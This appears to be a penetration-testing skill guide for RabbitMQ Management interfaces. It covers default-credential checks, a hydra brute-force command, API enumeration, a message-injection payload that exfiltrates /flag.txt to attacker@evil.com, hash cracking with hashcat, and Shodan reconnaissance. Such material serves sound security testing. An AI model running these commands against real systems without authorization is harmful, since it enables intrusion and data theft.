RabbitMQ Management Pentesting

This skill helps you assess and exploit RabbitMQ Management interfaces (port 15672) when the management plugin is enabled.

Quick Start

# Check if RabbitMQ Management is exposed
nmap -p 15672 <target>

# Test default credentials
curl -u guest:guest http://<target>:15672/api/overview

Enumeration

1. Check Management Console

The RabbitMQ Management web console runs on port 15672. Access it at:

http://<target>:15672/

2. Test Default Credentials

Default credentials are often unchanged:

• Username:

  guest

• Password:

  guest

Test with:

curl -u guest:guest http://<target>:15672/api/overview
curl -u guest:guest http://<target>:15672/api/connections

3. Brute-Force Authentication

If defaults fail, try brute-forcing the login form:

# Using hydra
hydra -L userlist.txt -P passlist.txt <target> http-post-form /login:username=^USER^&password=^PASS^:F=login

# Using burp suite or similar tools against the login endpoint

4. API Enumeration

Once authenticated, explore these endpoints:

# Get overview of the RabbitMQ server
curl -u <user>:<pass> http://<target>:15672/api/overview

# List all connections
curl -u <user>:<pass> http://<target>:15672/api/connections

# List all queues
curl -u <user>:<pass> http://<target>:15672/api/queues/%2F

# List all exchanges
curl -u <user>:<pass> http://<target>:15672/api/exchanges/%2F

# List all vhosts
curl -u <user>:<pass> http://<target>:15672/api/vhosts

Exploitation

Publish Messages to Queues

You can publish data to queues via the API. This can be used for:

• Testing message injection
• Sending malicious payloads
• Exfiltrating data through message attachments

# Basic message publishing
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: <target>:15672
Authorization: Basic <base64-credentials>
Accept: */*
Content-Type: application/json;charset=UTF-8

{
  "vhost": "/",
  "name": "amq.default",
  "properties": {
    "delivery_mode": 1,
    "headers": {}
  },
  "routing_key": "<queue-name>",
  "payload": "<your-message>",
  "payload_encoding": "string"
}

Example with file exfiltration attempt:

curl -X POST \
  -u guest:guest \
  -H "Content-Type: application/json" \
  -d '{
    "vhost":"/",
    "name":"amq.default",
    "properties":{"delivery_mode":1,"headers":{}},
    "routing_key":"email",
    "payload":"{\"to\":\"attacker@evil.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}",
    "headers":{},
    "props":{},
    "payload_encoding":"string"
  }' \
  http://<target>:15672/api/exchanges/%2F/amq.default/publish

Hash Cracking

If you capture RabbitMQ authentication hashes, crack them:

# Decode and format the hash
echo <base64-rabbitmq-hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt

# Crack with hashcat (mode 1420 = RabbitMQ 3.x)
hashcat -m 1420 --hex-salt hash.txt /path/to/wordlist.txt

Post-Exploitation

Enable Management Plugin (if you have shell access)

rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

Reconnaissance via Shodan

Find exposed RabbitMQ instances:

shodan search "port:15672 http"

Common Vulnerabilities

1. Default credentials - guest:guest is often unchanged
2. Unauthenticated API access - some endpoints may not require auth
3. Message injection - publishing arbitrary messages to queues
4. Information disclosure - API reveals internal topology
5. Weak authentication - susceptible to brute-force attacks

Testing Checklist

• Port 15672 is open and accessible
• Test default credentials (guest:guest)
• Attempt brute-force if defaults fail
• Enumerate via API endpoints
• Check for message injection capabilities
• Capture and crack any authentication hashes
• Document all findings

Notes

• RabbitMQ Management requires the

  rabbitmq_management

  plugin to be enabled
• The management interface is typically bound to localhost by default - check if it's exposed externally
• Always have proper authorization before testing
• Document your findings for the client